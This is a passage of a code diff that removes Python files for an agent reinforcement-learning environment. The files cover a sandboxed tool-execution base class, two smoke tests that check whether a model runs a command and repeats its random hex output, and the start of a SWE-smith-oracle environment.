if name in ("AgentEnv", "AgentEnvConfig"):
from .agent_env import AgentEnv, AgentEnvConfig
return {"AgentEnv": AgentEnv, "AgentEnvConfig": AgentEnvConfig}[name]
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
__all__ = ["AgentEnv", "AgentEnvConfig"]

View File

@@ -1,537 +0,0 @@
"""
AgentEnv - Atropos BaseEnv extension for agent/tool-call workloads.
AgentEnv is responsible for starting the sandbox tool execution backend and
providing helpers for running agent trajectories with queued/batched tool calls.
"""
from __future__ import annotations
import os
import asyncio
import time
import uuid
from abc import ABC, abstractmethod
from typing import Any, Awaitable, Callable, Dict, Generic, List, Optional, Tuple, TypeVar
from pydantic import Field
from atroposlib.envs.base import APIServerConfig, BaseEnv, BaseEnvConfig, Item, ScoredDataGroup, ScoredDataItem
from atroposlib.envs.server_handling.server_baseline import AsyncSemWithAdaptiveWeight
from ..agent import AgentConfig, AgentResult, AtroposAgent
from ..backends import ToolBackend, create_tool_backend
from ..tools import ToolRegistry, build_tool_registry
from ..tools.tool_executor import ToolExecutor, ToolExecutorConfig
# Main BaseEnv child classes. Child class THESE to get agent+tooling functionality easily.
class AgentEnvConfig(BaseEnvConfig):
tool_pool_mode: str = Field(default="nomad", description="Tool execution backend ('nomad' or 'modal')")
allow_network: bool = Field(
default=True,
description="Whether sandbox bash commands may access the network (env policy).",
)
require_sandbox: bool = Field(
default=False,
description="Fail closed if bubblewrap sandboxing is unavailable/unusable for stateless sandbox tools.",
)
require_stateful_sandbox: bool = Field(
default=False,
description="Fail closed if bubblewrap/PID isolation is unavailable for stateful terminal tools (tmux).",
)
tool_batch_window_ms: int = Field(default=20, description="ToolExecutor batching window (ms)")
tool_max_batch_size: int = Field(default=200, description="ToolExecutor maximum batch size")
# nomad mode settings. TODO: Add Modal support, split this into own config
nomad_address: str = Field(default="http://localhost:4646", description="Nomad API address")
sandbox_job_id: str = Field(default="atropos-sandbox-agent-env", description="Nomad job id for sandbox containers")
sandbox_image: str = Field(default="atropos-sandbox:local", description="Docker image for sandbox containers")
slots_per_container: int = Field(default=10, description="Nomad mode: slots per container")
min_containers: int = Field(default=1, description="Nomad mode: minimum containers")
max_containers: int = Field(default=10, description="Nomad mode: maximum containers")
privileged: bool = Field(default=False, description="Nomad mode: run container privileged")
acquire_timeout_s: float = Field(default=30.0, description="Slot acquisition timeout (seconds)")
purge_job_on_start: bool = Field(
default=False,
description=(
"Nomad mode: stop/purge the sandbox job on startup. This is helpful in local dev and training runs "
"to recover from previous crashes that leave the job in a restart backoff state."
),
)
purge_job_on_shutdown: bool = Field(default=True, description="Nomad mode: stop/purge job on shutdown")
# Nomad driver selection (docker or singularity)
driver: str = Field(
default="docker",
description="Nomad task driver: 'docker' (default) or 'singularity' (for HPC without sudo Docker)",
)
singularity_image: Optional[str] = Field(
default=None,
description="Path to .sif file for Singularity driver (required if driver='singularity')",
)
# Modal mode settings
modal_app_name: str = Field(default="atropos-sandbox", description="Modal app name prefix")
modal_image: str = Field(default="python:3.11", description="Modal: container image")
modal_gpu: Optional[str] = Field(default=None, description="Modal: GPU type (None, 'T4', 'A10G', 'A100', 'H100')")
modal_cpu: float = Field(default=1.0, description="Modal: CPU cores")
modal_memory: int = Field(default=2048, description="Modal: memory in MB")
modal_slots_per_sandbox: int = Field(default=10, description="Modal: slots per sandbox")
modal_min_sandboxes: int = Field(default=1, description="Modal: minimum sandboxes")
modal_max_sandboxes: int = Field(default=5, description="Modal: maximum sandboxes")
modal_idle_timeout: int = Field(default=120, description="Modal: server-side idle timeout (seconds)")
modal_max_lifetime: int = Field(default=3600, description="Modal: max sandbox lifetime (seconds)")
modal_acquire_timeout: float = Field(default=60.0, description="Modal: slot acquisition timeout (seconds)")
modal_execution_timeout: float = Field(default=30.0, description="Modal: default command execution timeout (seconds)")
modal_secrets: str = Field(default="", description="Modal: comma-separated list of Modal Secret names")
modal_env_vars: str = Field(default="", description="Modal: semicolon-separated KEY=VALUE pairs for env vars")
modal_workspace_base: str = Field(default="/data", description="Modal: workspace base directory in sandbox")
# basic agent defaults
agent_max_steps: int = Field(default=50, description="Max ReACT steps per trajectory")
agent_temperature: float = Field(default=0.7, description="Sampling temperature")
agent_max_tokens: Optional[int] = Field(
default=None,
description="Max tokens per model response (default: let backend decide)",
)
agent_tool_delay_s: float = Field(default=0.0, description="Delay between tool calls (seconds)")
# tool selection
enabled_toolsets: List[str] = Field(
default_factory=lambda: ["default"],
description="Toolsets to enable (Hermes-style grouping).",
)
disabled_toolsets: List[str] = Field(
default_factory=list,
description="Toolsets to disable (applied after enabled_toolsets).",
)
# external ToolServer routing (Phase 4.5+)
tool_server_url: Optional[str] = Field(
default=None,
description="Base URL for external ToolServer (enables external tools).",
)
tool_server_token: Optional[str] = Field(
default=None,
description="Bearer token for ToolServer auth (optional in dev).",
)
AgentEnvConfigT = TypeVar("AgentEnvConfigT", bound="AgentEnvConfig")
class AgentEnv(BaseEnv, ABC, Generic[AgentEnvConfigT]):
env_config_cls = AgentEnvConfig
def __init__(
self,
config: AgentEnvConfigT,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self.config: AgentEnvConfigT = config
self.tools: ToolRegistry = self.build_tools()
self._backend: Optional[ToolBackend] = None
self._tool_executor: Optional[ToolExecutor] = None
self._tool_server_inprocess: bool = False
self._trajectory_workspace_meta: Dict[str, Dict[str, Any]] = {}
def build_tools(self) -> ToolRegistry:
"""Wraps original Hermes-Agent ToolRegistry for atropos AgentEnv use.
See Hermes-Agent docs for toolsets and available tools etc.
"""
return build_tool_registry(
enabled_toolsets=self.config.enabled_toolsets or ["default"],
disabled_toolsets=self.config.disabled_toolsets or None,
tool_server_url=self.config.tool_server_url,
)
@abstractmethod
def build_task(self, item: Item) -> str:
"""Return the user-facing task string for the agent."""
@abstractmethod
async def score_trajectory(self, item: Item, final_response: str) -> float:
"""Return a scalar score for this trajectory."""
async def setup_trajectory_workspace(
self,
item: Item,
*,
trajectory_id: str,
exec_tool: Callable[["ToolCall"], Awaitable["ToolResult"]],
) -> Dict[str, Any]:
"""
Optional hook: prepare the sandbox workspace before the agent starts.
Examples:
- clone a repo and checkout a commit
- write fixture files (e.g. images) for external-tool demos
- pre-install dependencies
Default: no-op.
"""
_ = (item, trajectory_id, exec_tool)
return {}
async def verify_and_score_trajectory(
self,
item: Item,
final_response: str,
*,
trajectory_id: str,
exec_tool: Callable[["ToolCall"], Awaitable["ToolResult"]],
agent_result: Optional[AgentResult] = None,
workspace_meta: Optional[Dict[str, Any]] = None,
) -> tuple[float, Dict[str, Any]]:
"""
Optional hook: run in-sandbox verification before scoring.
Many agent envs need to execute verification inside the same trajectory
workspace (e.g. pytest) before releasing/resetting the slot.
Default: calls `score_trajectory()` and returns empty metadata.
"""
_ = (trajectory_id, exec_tool, agent_result, workspace_meta) # default ignores in-workspace verification
score = await self.score_trajectory(item, final_response)
return score, {}
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
return AgentConfig(
max_steps=self.config.agent_max_steps,
temperature=self.config.agent_temperature,
max_tokens=self.config.agent_max_tokens,
tool_delay_s=self.config.agent_tool_delay_s,
)
async def setup(self) -> None:
print(f"[AgentEnv] setup(): starting tool backend ({self.config.tool_pool_mode})", flush=True)
await self._start_tool_backend()
print("[AgentEnv] setup(): configuring server concurrency", flush=True)
self._configure_server_concurrency()
print("[AgentEnv] setup(): running env-specific setup_agent_env()", flush=True)
await self.setup_agent_env()
print("[AgentEnv] setup(): done", flush=True)
def _configure_server_concurrency(self) -> None:
"""
Ensure the LLM server concurrency isn't accidentally capped below `group_size`.
In `BaseEnv process` mode, groups are collected concurrently and if the underlying
ServerManager/OpenAIServer semaphore is left at 1, we serialize inference even
when `--env.group_size` is > 1.
"""
desired = int(getattr(self.config, "group_size", 1) or 1)
if desired <= 1:
return
servers = getattr(self.server, "servers", None)
if not isinstance(servers, list) or not servers:
return
for s in servers:
sem = getattr(s, "sem", None)
eval_sem = getattr(s, "eval_sem", None)
# Only increase; never shrink.
if sem is not None and getattr(sem, "max_val", 0) < desired:
s.sem = AsyncSemWithAdaptiveWeight(desired)
if hasattr(s, "config") and hasattr(s.config, "num_max_requests_at_once"):
s.config.num_max_requests_at_once = desired
if eval_sem is not None and getattr(eval_sem, "max_val", 0) < desired:
s.eval_sem = AsyncSemWithAdaptiveWeight(desired)
if hasattr(s, "config") and hasattr(s.config, "num_requests_for_eval"):
s.config.num_requests_for_eval = desired
@abstractmethod
async def setup_agent_env(self) -> None:
"""Subclass hook for env-specific setup."""
async def evaluate(self, *args, **kwargs): # noqa: ARG002
"""
Default eval hook (no-op).
Atropos BaseEnv requires an `evaluate()` implementation. Many agent envs
won't have a meaningful evaluation path during early PoC work; they can
override this when needed.
"""
return {}
async def env_manager(self):
try:
return await super().env_manager()
finally:
await self.shutdown_tool_backend()
async def process_manager(self):
try:
return await super().process_manager()
finally:
await self.shutdown_tool_backend()
async def _start_tool_backend(self) -> None:
if self._tool_executor is not None:
return
tool_server_url = self.config.tool_server_url
tool_server_client = None
if tool_server_url == "inprocess":
import httpx
from ..api.tool_server import app as tool_server_app
await tool_server_app.router.startup()
tool_server_client = httpx.AsyncClient(
transport=httpx.ASGITransport(app=tool_server_app),
base_url="http://toolserver",
)
tool_server_url = "http://toolserver"
self._tool_server_inprocess = True
backend = create_tool_backend(self.config)
await backend.start()
executor = ToolExecutor(
backend=backend,
tools=self.tools,
config=ToolExecutorConfig(
batch_window_ms=self.config.tool_batch_window_ms,
max_batch_size=self.config.tool_max_batch_size,
allow_network=self.config.allow_network,
require_sandbox=self.config.require_sandbox,
require_stateful_sandbox=self.config.require_stateful_sandbox,
tool_server_url=tool_server_url,
tool_server_token=self.config.tool_server_token,
),
)
await executor.start()
if tool_server_client is not None:
executor._tool_server_client = tool_server_client # type: ignore[attr-defined]
self._backend = backend
self._tool_executor = executor
async def shutdown_tool_backend(self) -> None:
executor = self._tool_executor
backend = self._backend
inprocess_tool_server = self._tool_server_inprocess
self._tool_executor = None
self._backend = None
self._tool_server_inprocess = False
if executor is not None:
await executor.close()
if backend is not None:
await backend.stop(purge=bool(self.config.purge_job_on_shutdown))
if inprocess_tool_server:
from ..api.tool_server import app as tool_server_app
await tool_server_app.router.shutdown()
async def collect_trajectory(
self, item: Item
) -> Tuple[Optional[ScoredDataItem], List[Item]]:
if self._tool_executor is None:
raise RuntimeError("Tool backend not started")
trajectory_id = str(uuid.uuid4())
t0 = time.perf_counter()
print(f"[AgentEnv] collect_trajectory(): tid={trajectory_id} start", flush=True)
task = self.build_task(item)
agent_config = self.build_agent_config(item)
if os.getenv("ATROPOS_DEBUG_PRINT_TASK") == "1":
print(f"Starting trajectory {trajectory_id} with task: {task}", flush=True)
else:
# Avoid printing the full task prompt by default (can be huge/noisy).
one_line = " ".join(str(task).splitlines()).strip()
preview = one_line[:240] + ("" if len(one_line) > 240 else "")
print(f"Starting trajectory {trajectory_id} (task preview): {preview}", flush=True)
async def _exec(call):
return await self._tool_executor.execute(trajectory_id, call)
agent = AtroposAgent(
server=self.server,
tokenizer=self.tokenizer,
tools=self.tools,
config=agent_config,
execute_tool=_exec,
)
try:
print(f"[AgentEnv] tid={trajectory_id} setup_trajectory_workspace() start", flush=True)
workspace_meta = await self.setup_trajectory_workspace(item, trajectory_id=trajectory_id, exec_tool=_exec)
if not isinstance(workspace_meta, dict):
workspace_meta = {}
self._trajectory_workspace_meta[trajectory_id] = workspace_meta
print(
f"[AgentEnv] tid={trajectory_id} setup_trajectory_workspace() done in {time.perf_counter() - t0:.2f}s",
flush=True,
)
print(f"[AgentEnv] tid={trajectory_id} agent.run() start", flush=True)
result = await agent.run(task)
print(
f"[AgentEnv] tid={trajectory_id} agent.run() done in {time.perf_counter() - t0:.2f}s "
f"success={result.success} tool_calls={result.total_tool_calls}",
flush=True,
)
if not result.success or result.trajectory_data is None:
# Do not trigger BaseEnv retries for agent failures.
# Record the trajectory with score 0.0 so training/eval can see the failure mode.
messages = [{"role": "system", "content": agent._build_system_prompt()}] # noqa: SLF001
messages.append({"role": "user", "content": task})
for step in result.steps:
messages.append({"role": "assistant", "content": step.assistant_message})
if step.tool_results:
tool_text = "\n".join(r.to_xml() for r in step.tool_results)
messages.append({"role": "user", "content": tool_text})
scored: ScoredDataItem = {
"tokens": (result.trajectory_data.tokens if result.trajectory_data else []),
"masks": (result.trajectory_data.masked_tokens if result.trajectory_data else []),
"scores": 0.0,
}
if result.trajectory_data is not None:
scored["inference_logprobs"] = result.trajectory_data.logprobs # type: ignore[typeddict-unknown-key]
if getattr(result.trajectory_data, "metadata", None):
scored["overrides"] = {"managed_metadata": result.trajectory_data.metadata}
if self.config.include_messages:
# Record a final failure marker as a user-side tool_response-like block so it survives templates.
import json
err = result.error or "agent_failed"
messages.append(
{
"role": "user",
"content": f"<tool_response>{json.dumps({'success': False, 'error': err})}</tool_response>",
}
)
scored["messages"] = messages
return scored, []
print(f"[AgentEnv] tid={trajectory_id} verify_and_score_trajectory() start", flush=True)
score, score_metadata = await self.verify_and_score_trajectory(
item,
result.final_response,
trajectory_id=trajectory_id,
exec_tool=_exec,
agent_result=result,
workspace_meta=workspace_meta,
)
print(
f"[AgentEnv] tid={trajectory_id} verify_and_score_trajectory() done in {time.perf_counter() - t0:.2f}s "
f"score={score}",
flush=True,
)
messages = [{"role": "system", "content": agent._build_system_prompt()}] # noqa: SLF001
messages.append({"role": "user", "content": task})
for step in result.steps:
messages.append({"role": "assistant", "content": step.assistant_message})
if step.tool_results:
tool_text = "\n".join(r.to_xml() for r in step.tool_results)
messages.append({"role": "user", "content": tool_text})
# Optional: allow env verification to attach additional messages (e.g. install logs).
if self.config.include_messages and isinstance(score_metadata, dict):
extra = score_metadata.get("verification_messages")
if isinstance(extra, list):
for m in extra:
if isinstance(m, dict) and isinstance(m.get("role"), str) and isinstance(m.get("content"), str):
messages.append({"role": m["role"], "content": m["content"]})
scored: ScoredDataItem = {
"tokens": result.trajectory_data.tokens,
"masks": result.trajectory_data.masked_tokens,
"scores": score,
}
# Atroposlib expects policy logprobs at the *group* level under `inference_logprobs`.
# We stash per-item values here and lift them into the group in `collect_trajectories()`.
scored["inference_logprobs"] = result.trajectory_data.logprobs # type: ignore[typeddict-unknown-key]
if getattr(result.trajectory_data, "metadata", None):
scored["overrides"] = {"managed_metadata": result.trajectory_data.metadata}
if self.config.include_messages:
scored["messages"] = messages
return scored, []
finally:
self._trajectory_workspace_meta.pop(trajectory_id, None)
print(f"[AgentEnv] tid={trajectory_id} release_trajectory(reset_workspace=True)", flush=True)
await self._tool_executor.release_trajectory(trajectory_id, reset_workspace=True)
print(f"[AgentEnv] collect_trajectory(): tid={trajectory_id} done in {time.perf_counter() - t0:.2f}s", flush=True)
async def collect_trajectories(
self, item: Item
) -> Tuple[Optional[ScoredDataGroup], List[Item]]:
tasks = [self.collect_trajectory(item) for _ in range(self.config.group_size)]
results = await asyncio.gather(*tasks)
backlog: List[Item] = []
items: List[ScoredDataItem] = []
for scored, b in results:
backlog.extend(b)
if scored is not None:
items.append(scored)
if len(items) != self.config.group_size:
return None, backlog
group: ScoredDataGroup = ScoredDataGroup(
tokens=[],
masks=[],
scores=[],
advantages=[],
ref_logprobs=[],
messages=[] if self.config.include_messages else None,
inference_logprobs=[],
group_overrides={},
overrides=[],
images=[],
generation_params=None,
)
for it in items:
group["tokens"].append(it["tokens"])
group["masks"].append(it["masks"])
group["scores"].append(it["scores"])
# policy logprobs (for PPO/GRPO training) if present
lp = it.get("inference_logprobs") # type: ignore[typeddict-item]
if lp is not None:
group["inference_logprobs"].append(lp)
group["overrides"].append(it.get("overrides") or {}) # type: ignore[typeddict-item]
if group.get("messages") is not None and it.get("messages") is not None:
group["messages"].append(it["messages"])
return group, backlog
async def run_agent(self, task: str, *, trajectory_id: Optional[str] = None) -> Tuple[str, Dict[str, Any]]:
"""
Run the AtroposAgent on a single task and return (final_response, debug).
This is a helper intended for simple environments and tests.
"""
if self._tool_executor is None:
raise RuntimeError("Tool backend not started")
tid = trajectory_id or str(uuid.uuid4())
async def _exec(call):
return await self._tool_executor.execute(tid, call)
agent = AtroposAgent(
server=self.server,
tokenizer=self.tokenizer,
tools=self.tools,
config=AgentConfig(
max_steps=self.config.agent_max_steps,
temperature=self.config.agent_temperature,
max_tokens=self.config.agent_max_tokens,
),
execute_tool=_exec,
)
result = await agent.run(task)
await self._tool_executor.release_trajectory(tid, reset_workspace=True)
return result.final_response, {"success": result.success, "error": result.error, "tool_calls": result.total_tool_calls}

View File

@@ -1,171 +0,0 @@
"""
Hermes-Agent + Atropos (Nomad sandbox) compatibility smoke environment.
This environment is intended to validate, end-to-end:
BaseEnv.process -> AgentEnv -> ToolExecutor (batched) -> Nomad SlotPool -> sandbox_server
It forces the model to use a sandbox tool by asking it to run a command that
generates a high-entropy token inside the sandbox, then repeat it exactly.
Run (process mode):
uv run python -m atropos.envs.hermes_compat_test_env process --env.use_wandb false --env.total_steps 2 --env.group_size 1
"""
from __future__ import annotations
import os
from typing import Any, Dict, List, Tuple
from dotenv import load_dotenv
from pydantic import Field
from atroposlib.envs.base import APIServerConfig, Item
from ..agent import AgentConfig, AgentResult
from ..tools import ToolCall
from .agent_env import AgentEnv, AgentEnvConfig
load_dotenv()
def _forced_tool_item() -> Item:
# Use double quotes in the shell command and show JSON escaping explicitly.
# This avoids invalid JSON escapes like `\\'` (not valid JSON) that some models produce.
cmd = 'python -c "import secrets; print(secrets.token_hex(16))"'
return {
"command": cmd,
"prompt": (
"You are acting as an agent inside a sandboxed environment.\n"
"You MUST use the terminal tool to execute commands.\n"
"Run this exact command:\n"
f"{cmd}\n"
"When you call the tool, use valid JSON inside <tool_call>. Example:\n"
'<tool_call>{"name": "terminal", "arguments": {"command": '
'"python -c \\\\"import secrets; print(secrets.token_hex(16))\\\\""}}'
"</tool_call>\n"
"Then respond with EXACTLY what it printed (the hex token) and nothing else.\n"
"Do not guess. Do not explain."
),
}
class HermesCompatTestEnvConfig(AgentEnvConfig):
server_base_url: str = Field(
default="http://127.0.0.1:8080",
description="Base URL for an OpenAI-compatible chat server (without /v1).",
)
server_model: str = Field(default="hermes-4-36b", description="Model name")
tokenizer_name: str = Field(default="NousResearch/Hermes-4.3-36B", description="Tokenizer name for RL tokenization")
class HermesCompatTestEnv(AgentEnv[HermesCompatTestEnvConfig]):
name = "hermes_compat_test_env"
env_config_cls = HermesCompatTestEnvConfig
def __init__(
self,
config: HermesCompatTestEnvConfig,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self._iter = 0
@classmethod
def config_init(cls) -> Tuple[HermesCompatTestEnvConfig, List[APIServerConfig]]:
base_url = (
os.getenv("ATROPOS_SERVER_BASE_URL")
or os.getenv("OPENAI_BASE_URL")
or os.getenv("LLM_BASE_URL")
or "http://127.0.0.1:8080"
)
model = os.getenv("ATROPOS_SERVER_MODEL") or os.getenv("LLM_MODEL") or "hermes-4-36b"
api_key = os.getenv("ATROPOS_SERVER_API_KEY") or os.getenv("NOUS_API_KEY") or os.getenv("OPENAI_API_KEY") or "local"
env_config = HermesCompatTestEnvConfig(
tokenizer_name=os.getenv("ATROPOS_TOKENIZER_NAME") or "NousResearch/Hermes-4.3-36B",
group_size=1,
use_wandb=False,
include_messages=True,
ensure_scores_are_not_same=False,
total_steps=2,
batch_size=1,
server_base_url=base_url,
server_model=model,
# Tooling: sandbox-only terminal.
enabled_toolsets=["terminal"],
disabled_toolsets=[],
# Default to Nomad sandboxing; users can override via --env.* args.
sandbox_image=os.getenv("ATROPOS_SANDBOX_IMAGE") or "atropos-sandbox:local",
# In local dev it's common for a previous crash to leave the job in backoff.
purge_job_on_start=True,
purge_job_on_shutdown=True,
)
server_configs = [
APIServerConfig(
model_name=model,
base_url=f"{base_url.rstrip('/')}/v1",
api_key=api_key,
num_max_requests_at_once=1,
num_requests_for_eval=1,
timeout=120,
)
]
return env_config, server_configs
async def setup_agent_env(self) -> None:
return None
async def get_next_item(self) -> Item:
self._iter += 1
return _forced_tool_item()
def build_task(self, item: Item) -> str:
return str(item.get("prompt") or "")
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
# Avoid imposing max_tokens by default; tool-tag responses can be long for some models.
return AgentConfig(
max_steps=min(8, int(self.config.agent_max_steps)),
temperature=0.2,
max_tokens=None,
)
async def score_trajectory(self, item: Item, final_response: str) -> float:
# Scoring happens in verify_and_score_trajectory so we can inspect tool results.
_ = (item, final_response)
return 0.0
async def verify_and_score_trajectory(
self,
item: Item,
final_response: str,
*,
trajectory_id: str, # noqa: ARG002
exec_tool, # noqa: ARG002
agent_result: AgentResult | None = None,
workspace_meta: Dict[str, Any] | None = None, # noqa: ARG002
) -> tuple[float, Dict[str, Any]]:
if agent_result is None:
return 0.0, {"error": "Missing agent_result"}
observed: str = ""
tool_ok = False
for step in agent_result.steps:
for res in step.tool_results:
if not res.success:
return 0.0, {"error": res.error, "output": res.output}
out = (res.output or "").strip()
if out:
observed = out.splitlines()[-1].strip()
tool_ok = True
final = (final_response or "").strip()
score = 1.0 if tool_ok and agent_result.total_tool_calls > 0 and observed and final == observed else 0.0
return score, {"observed": observed, "tool_calls": agent_result.total_tool_calls, "command": item.get("command")}
if __name__ == "__main__":
HermesCompatTestEnv.cli()

View File

@@ -1,172 +0,0 @@
"""
Nomad sandbox terminal smoke environment (training-oriented).
Validates, end-to-end:
BaseEnv.process -> AgentEnv -> ToolExecutor (batched) -> Nomad SlotPool -> sandbox_server
It forces the model to use a sandbox tool by asking it to run a command that
generates a high-entropy token inside the sandbox, then repeat it exactly.
Run (process mode):
uv run python -m atropos.envs.sandbox_terminal_smoke_env process --env.use_wandb false --env.total_steps 2 --env.group_size 1
"""
from __future__ import annotations
import os
from typing import Any, Dict, List, Tuple
from dotenv import load_dotenv
from pydantic import Field
from atroposlib.envs.base import APIServerConfig, Item
from ..agent import AgentConfig, AgentResult
from ..tools import ToolCall
from .agent_env import AgentEnv, AgentEnvConfig
load_dotenv()
STRICT_TOOLCALL_SYSTEM_PROMPT = None
def _forced_tool_item() -> Item:
# Use double quotes in the shell command and show JSON escaping explicitly.
# This avoids invalid JSON escapes like `\\'` (not valid JSON) that some models produce.
cmd = 'python -c "import secrets; print(secrets.token_hex(16))"'
return {
"command": cmd,
"prompt": (
"You MUST use the terminal tool.\n"
"Run this exact command:\n"
f"{cmd}\n"
"When you call the tool, use valid JSON inside <tool_call>. Example:\n"
'<tool_call>{"name": "terminal", "arguments": {"command": '
'"python -c \\\\"import secrets; print(secrets.token_hex(16))\\\\""}}'
"</tool_call>\n"
"Then respond with EXACTLY what it printed (the hex token) and nothing else.\n"
"Do not guess. Do not explain."
),
}
class SandboxTerminalSmokeEnvConfig(AgentEnvConfig):
server_base_url: str = Field(
default="http://127.0.0.1:8080",
description="Base URL for an OpenAI-compatible chat server (without /v1).",
)
server_model: str = Field(default="hermes-4-36b", description="Model name")
tokenizer_name: str = Field(default="NousResearch/Hermes-4.3-36B", description="Tokenizer name for RL tokenization")
class SandboxTerminalSmokeEnv(AgentEnv[SandboxTerminalSmokeEnvConfig]):
name = "sandbox_terminal_smoke_env"
env_config_cls = SandboxTerminalSmokeEnvConfig
def __init__(
self,
config: SandboxTerminalSmokeEnvConfig,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self._iter = 0
@classmethod
def config_init(cls) -> Tuple[SandboxTerminalSmokeEnvConfig, List[APIServerConfig]]:
base_url = (
os.getenv("ATROPOS_SERVER_BASE_URL")
or os.getenv("OPENAI_BASE_URL")
or os.getenv("LLM_BASE_URL")
or "http://127.0.0.1:8080"
)
model = os.getenv("ATROPOS_SERVER_MODEL") or os.getenv("LLM_MODEL") or "hermes-4-36b"
api_key = os.getenv("ATROPOS_SERVER_API_KEY") or os.getenv("NOUS_API_KEY") or os.getenv("OPENAI_API_KEY") or "local"
env_config = SandboxTerminalSmokeEnvConfig(
tokenizer_name=os.getenv("ATROPOS_TOKENIZER_NAME") or "NousResearch/Hermes-4.3-36B",
group_size=1,
use_wandb=False,
include_messages=True,
ensure_scores_are_not_same=False,
total_steps=2,
batch_size=1,
server_base_url=base_url,
server_model=model,
# Tooling: sandbox-only terminal.
enabled_toolsets=["terminal"],
disabled_toolsets=[],
# Default to Nomad sandboxing; users can override via --env.* args.
sandbox_image=os.getenv("ATROPOS_SANDBOX_IMAGE") or "atropos-sandbox:local",
purge_job_on_start=True,
purge_job_on_shutdown=True,
)
server_configs = [
APIServerConfig(
model_name=model,
base_url=f"{base_url.rstrip('/')}/v1",
api_key=api_key,
num_max_requests_at_once=1,
num_requests_for_eval=1,
timeout=120,
)
]
return env_config, server_configs
async def setup_agent_env(self) -> None:
return None
async def get_next_item(self) -> Item:
self._iter += 1
return _forced_tool_item()
def build_task(self, item: Item) -> str:
return str(item.get("prompt") or "")
def build_agent_config(self, item: Item) -> AgentConfig: # noqa: ARG002
# Avoid imposing max_tokens by default; tool-tag responses can be long for some models.
return AgentConfig(
max_steps=min(8, int(self.config.agent_max_steps)),
temperature=0.2,
max_tokens=None,
system_prompt=STRICT_TOOLCALL_SYSTEM_PROMPT,
)
async def score_trajectory(self, item: Item, final_response: str) -> float:
# Scoring happens in verify_and_score_trajectory so we can inspect tool results.
_ = (item, final_response)
return 0.0
async def verify_and_score_trajectory(
self,
item: Item,
final_response: str,
*,
trajectory_id: str, # noqa: ARG002
exec_tool, # noqa: ARG002
agent_result: AgentResult | None = None,
workspace_meta: Dict[str, Any] | None = None, # noqa: ARG002
) -> tuple[float, Dict[str, Any]]:
if agent_result is None:
return 0.0, {"error": "Missing agent_result"}
observed: str = ""
tool_ok = False
for step in agent_result.steps:
for res in step.tool_results:
if not res.success:
return 0.0, {"error": res.error, "output": res.output}
out = (res.output or "").strip()
if out:
observed = out.splitlines()[-1].strip()
tool_ok = True
final = (final_response or "").strip()
score = 1.0 if tool_ok and agent_result.total_tool_calls > 0 and observed and final == observed else 0.0
return score, {"observed": observed, "tool_calls": agent_result.total_tool_calls, "command": item.get("command")}
if __name__ == "__main__":
SandboxTerminalSmokeEnv.cli()

View File

@@ -1,418 +0,0 @@
"""
SWE-smith-oracle environment.
This environment is intentionally minimal:
- prepares a sandbox workspace by cloning a public GitHub repo at `base_commit`
- runs an AtroposAgent tool loop to apply a fix
- verifies by running pytest nodeids from the dataset (reward = pass/fail)
- Python only (no multi-language support currently, need to properly bauild & add to dropbox)
- TODO: Get the other nonpython sandboxes up and running, then add a config knob to switch between them per row
- oh and add to dockerhub
Dataset: NousResearch/SWE-smith-oracle (train; does NOT use SWE-bench eval set).
"""
from __future__ import annotations
import os
import random
import time
from typing import Any, Dict, List, Optional, Tuple
from pydantic import Field
from atroposlib.envs.base import APIServerConfig, Item
from ..agent import AgentConfig
from ..tools import ToolCall
from .agent_env import AgentEnv, AgentEnvConfig
class SweSmithOracleEnvConfig(AgentEnvConfig):
dataset_name: str = Field(default="NousResearch/SWE-smith-oracle")
dataset_split: str = Field(default="train")
max_items: int = Field(default=0, description="0 = no limit")
shuffle: bool = Field(default=True)
seed: int = Field(default=0)
python_only: bool = Field(default=True, description="Filter to Python-evaluable rows")
score_include_fail_to_pass: bool = Field(
default=True,
description=(
"If true (default), score tests on PASS_TO_PASS FAIL_TO_PASS. "
"Disable to only run PASS_TO_PASS (faster but weaker signal)."
),
)
prompt_mode: str = Field(
default="problem_statement",
description="Task prompt content: 'problem_statement' (fast) or 'problem_statement+text' (slower, includes dataset 'text').",
)
repo_base_url: str = Field(default="https://github.com", description="Base URL for repo cloning")
install_timeout_s: float = Field(default=600.0)
test_timeout_s: float = Field(default=600.0)
tokenizer_name: str = Field(default="NousResearch/Hermes-4.3-36B", description="Tokenizer name for RL tokenization")
class SweSmithOracleEnv(AgentEnv[SweSmithOracleEnvConfig]):
"""
SWE-smith-oracle AgentEnv.
This is designed for benchmarking multiplexed slot execution vs naive container-per-trajectory.
"""
name = "swe_smith_oracle_env"
env_config_cls = SweSmithOracleEnvConfig
def __init__(
self,
config: SweSmithOracleEnvConfig,
server_configs: List[APIServerConfig],
slurm: bool = False,
testing: bool = False,
):
super().__init__(config, server_configs, slurm, testing)
self._dataset = None
self._indices: List[int] = []
self._cursor = 0
@classmethod
def config_init(cls) -> Tuple[SweSmithOracleEnvConfig, List[APIServerConfig]]:
# Defaults for running the env via CLI in offline `process` mode.
# Override via env vars or `--env.*` flags as needed.
base_url_raw = (
os.getenv("ATROPOS_SERVER_BASE_URL")
or os.getenv("OPENAI_BASE_URL")
or os.getenv("LLM_BASE_URL")
or "http://127.0.0.1:8080"
)
base_url = base_url_raw.rstrip("/")
if not base_url.endswith("/v1"):
base_url = f"{base_url}/v1"
model = os.getenv("ATROPOS_SERVER_MODEL") or os.getenv("LLM_MODEL") or "hermes-4-36b"
api_key = os.getenv("ATROPOS_SERVER_API_KEY") or os.getenv("NOUS_API_KEY") or os.getenv("OPENAI_API_KEY") or "local"
env_config = SweSmithOracleEnvConfig(
tokenizer_name=os.getenv("ATROPOS_TOKENIZER_NAME") or "NousResearch/Hermes-4.3-36B",
group_size=1,
use_wandb=False,
rollout_server_url="http://localhost:8000",
total_steps=1,
batch_size=1,
steps_per_eval=1,
max_token_length=8192,
inference_weight=1.0,
wandb_name="swe_smith_oracle",
enabled_toolsets=["terminal"],
disabled_toolsets=[],
sandbox_image=os.getenv("ATROPOS_SANDBOX_IMAGE") or "atropos-sandbox:local",
purge_job_on_start=True,
purge_job_on_shutdown=True,
)
server_configs = [
APIServerConfig(
model_name=model,
base_url=base_url,
api_key=api_key,
